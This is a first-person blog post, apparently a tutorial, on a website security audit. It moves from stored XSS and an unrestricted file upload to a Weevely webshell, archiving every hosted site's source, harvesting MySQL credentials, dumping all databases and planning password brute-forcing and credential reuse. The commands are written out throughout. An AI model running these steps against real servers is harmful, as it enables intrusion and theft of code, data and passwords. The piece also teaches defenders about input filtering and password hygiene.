On the one hand, this story is based on a real security audit case, that is, if I could talk about it without cuts, it would have resulted in a case from which new web application security auditors or webmasters and administrators could learn something new. But, as with any case study, it is not necessary that in your practice there will be something similar and the information will be useful.
But, on the other hand, I can tell about some moments only in general terms. Therefore, in this manual there will be as few teams and screenshots as ever (maybe, there will not be any).
The site was a web application written from scratch. To use the functions, you need to enter your login and password, but there is a guest login account, so the guest account information is written on the site right on the main page.
Performed actions are saved in History. An action has a title and certain text. It turned out that the stored fields are not filtered for special characters and words, so we quickly managed to find and confirm the XSS vulnerability – that is, enter something like the code in the field
Using the vulnerability, it is possible, for example, to steal cookies from other users. But the problem is that, apparently, History, each user has his own. That is, the maximum that I can do in this situation is to grab cookies of users with exactly the same privileges as mine – that is, only of users who have logged in under the guest account. Perhaps the full list of History of all users is available for the admin – but not a fact. Plus, you have to figure out how to provoke him to enter the History – otherwise it may happen that the next time he comes there in a year, or two, or never.
Since it is clear that special characters are not filtered, and the data is most likely stored in a database, this may mean that there must be a SQL-injection vulnerability that allows ones to get a web site database. But I did not have time to check it – a much easier vulnerability was discovered – insecure file upload.
The bottom line is that if I launched a new action, then several fields were available to me for input – I found the XSS and could detect the SQL-injection in them. But when opening a saved action from History, another field appeared on the page – for downloading a file!!!
I had a moderate gladness: on the one hand, one can upload files to many sites, but due to the restriction on the extensions of the downloaded files, as well as the way to access them, it is almost impossible to upload code that can be executed on the server. But disorder with the filtering of data in text fields inspired some hope.
I created the file
And I uploaded it to the server. The server showed me a link to this file. That is, the file is there! I clicked on the link and instead of downloading, or to show the content of the file – the file was executed, that is, I saw the information that the phpinfo() function shows.
What are the programmer's mistakes:
Such a disorderly style of programming can not be combined with a public account. That is, if the login information would not written on the main page, the search and exploitation of these vulnerabilities would be greatly delayed.
And more importantly: when writing code, you should always filter user input and limit the files that can be uploaded to the server. Even if you program “for yourself” and keep the files on a local server on your computer, a nuisance can still happen – someone can connect to your web server via a local network (when you are using the public Internet), or your computer may be available directly, if it has white IP. Obviously, for a public site, the code should be written with a constant concern about security.
At the beginning I wanted to use the simplest option – c99unlimited.php. This shell looks like web-based file manager and it is convenient to browse through the directories and download files. But it did not work for me – it resulted an Error 500. Apparently, the server has some kind of incompatibility with it.
This is absolutely not a problem, there are a lot of various shells in Webshells – you pick up for a long time the one you like, but I decided to use even more beloved Weevely. I have even more feelings for this tool)))) Although it has a command line interface, I like it even more.
Create a new backdoor (yes, the password is just a number 1):
weevely generate 1 test.php
I uploaded it on the server.
And connect to it:
weevely https://site.ru/upload/8579.php 1
After connecting, Weevely showed that I am in the /var/www/XX1/tmp folder.
You can further verify this:
Let's see what permissions I have on this folder:
ls -dl .
drwxrwxrwx 2 XX1 root 4096 Apr 21 14:16 .
From this information it follows that the owner of the folder is users XX1. But everyone has the right to write.
By the way, who am I there?
I am www-data user.
By the way, why did I suddenly rush to look for a folder with the permission to write? The fact is that I need to download the files with the source code – for further analysis ‘in a calm atmosphere’. These files are many and downloading them all one by one will take a lot of time. Therefore, I have a plan to pack all the files into an archive, and download the archive.
Of course, I can use the /tmp directory, which is always open to write for everyone. But from the /tmp folder I can only download using Weevely. But if I manage to save the archive to a web server folder, then I can download it directly via a web browser or file downloading tool. This is especially true if the file is very large – it may be useful to resume the file downloading after the connection is broken, which is impossible with the command line with Weevely.
It is clear that if we are in the /var/www/XX1/tmp folder, then the web server folder is /var/www/. Let's see what's in it:
ls -l /var/www/
There are folders of other sites – a total of 14 items.
To pack files to an archive with the zip command I need to use the -r option to recursively add everything that is in folders, run as follows:
zip -r archive_name.zip directory_for_archiving
The directory for archiving is /var/www/, I’ll save the archive to the /tmp directory (and not to the folder with sites, as it will turn out that we will try to save the archive in a folder that is added to this archive – perhaps this will cause an error).
I run the command:
zip -r /tmp/archive.zip /var/www/
What the message returns to me:
sh: 1: zip: not found
Hell, zip is not installed on this server. You can use the Weevely built-in archiving emulator, but I'll try another program:
tar czf /tmp/archive.tgz /var/www/
But the tar program was on the server. Internal commands mean:
I move the archive to the web server folder, where it is now available for download even using a browser:
mv /tmp/archive.tgz /var/www/XX1/tmp
To find out the size of all subfolders in the /var/www/:
du -sh /var/www/*
If you need to download only some folders, this is done by a command like this:
tar czf archive.tgz folder_in_archive_1 folder_in_archive_2 folder_in_archive_3 folder_in_archive_4
The source code is a very valuable trophy and it will still help us a lot. But, as I have already said, there are many folders with sites on this server – that is, there are many sites here.
A list of all loaded settings and processed virtual hosts can be found with the -S option. And with -t -D DUMP_INCLUDES you can see all the configuration files used. It is an issue – the executable file of the web server can be called either httpd or apache2, depending on the system. On Debian derivatives, the file will be called apache2. And on Arch Linux derivatives, it is called httpd. In principle, there is no problem to try both commands and see which one works:
httpd -t -D DUMP_INCLUDES
apache2 -t -D DUMP_INCLUDES
As I said, under normal conditions these options should show all configuration files and all virtual hosts. But, apparently, that programmer who wrote the code for the site, he also configured the web server — instead of the expected information, I only get an error message in one of the configuration files — there is no SSL certificate. By the way, this means that when computer or just a web server will be restarted, Apache, in theory, will not start, since this is (like) a fatal error.
Okay, check by hand. If the binary is called apache2, then the configuration files are stored in /etc/apache2.
The main Apache configuration file is /etc/apache2/apache2.conf.
Other configuration files are stored in the /etc/apache2/conf-available folder, and in the /etc/apache2/conf-enabled folder you can find out which of them are enabled.
In the /etc/apache2/mods-enabled folder, you can see which Apache modules are enabled.
In the /etc/apache2/sites-available folder, you can find out the settings for which sites are provided, and in the /etc/apache2/sites-enabled folder – which of them are currently active.
Unfortunately, I can’t show you the content, I can only say that there were 18 configuration files in sites-available. In these files for each site at least 2 mandatory directives:
With the help of this technique you can find out what other sites this server hosts and where the source code of each of them is located on the server.
I just grab them all:
tar czf /var/www/XX1/upload/apache_archive.tgz /etc/apache2/
If we have access to the file system, then getting a password from MySQL is easy.
As described above (analysis of virtual hosts and viewing the contents of the site folders) we find the address of phpMyAdmin. But phpMyAdmin may be absent – no problem, you can work with the database through the console.
The most important thing is to analyze the source code of the sites and find the credentials there. To simplify this task, you can search through the contents of files, special attention should be paid to such lines as:
As well as files with speaking names, for example, connectdb.php.
Weevely has a command to connect to MySQL from the command line:
:sql_console -user USER -passwd PASSWORD -host localhost
Or, if MySQL allows remote connections, you can connect to the host directly:
mysql -u USER -pPASSWORD -h SERVER_IP
There inside you can see the database:
There you can also see the tables in the database and the contents of the tables.
If you need to dump all databases for download, this is done with the command:
mysqldump -u USER -pPASSWORD --all-databases > all-databases.sql
There is no space between the -p option and the PASSWORD – otherwise an error occurs.
The database has revealed a lot of interesting information. But the most interesting is the list of users with passwords.
We have usernames and passwords (as well as emails and other profile-specific information). The administrator password for logging into the service is exactly the same as the root password for MySQL. Let me remind you if you mess up: we found the password from MySQL in the source code of the site files, and we found the password for the admin of the service (site) in the database. Although they turned out to be the same
This is important – the user tends to use the same passwords – this is a vulnerability also, by the way.
But even more interesting is the analysis of all user passwords – almost all of them are six-digit numbers! Apparently, the credentials were generated and issued by the administrator. The administrator has a tendency to create passwords of the same type – take this into account. That is, if I have to brute-force the services on this service (and I will have to ), then I already know what the dictionary will be – this will be a complete list of six-digit numbers.
Well, in general – if the passwords are the same, then it makes sense to look for other services – all of a sudden, the logins and passwords that we already have will also fit there.
So: the server is compromised through a vulnerable web application.
Already at this stage:
Now I can make a report for the customer (website owner) and finish with this website security audit.
Report summary: everything is bad.
But this story will also have the second part. See the continuation of ‘How to hack websites (part 2)’.
Your email address will not be published.
Notify me of followup comments via e-mail. You can also subscribe without commenting.